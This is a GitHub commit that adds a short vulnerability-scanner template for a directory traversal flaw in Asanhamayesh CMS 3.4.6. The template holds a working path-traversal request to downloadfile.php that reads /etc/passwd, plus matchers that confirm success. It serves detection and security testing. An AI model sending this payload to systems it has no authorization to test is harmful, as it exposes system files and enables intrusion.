Merge pull request #3358 from Akokonunes/patch-91

Create asanhamayesh-cms-lfi.yaml
patch-1
Prince Chaddha 2021-12-18 14:32:12 +05:30 committed by GitHub
commit d911551318
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
id: asanhamayesh-lfi
info:
name: Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability
author: 0x_Akoko
severity: high
reference:
- https://cxsecurity.com/issue/WLB-2018030006
- https://asanhamayesh.com
tags: asanhamayesh,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/downloadfile.php?file=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200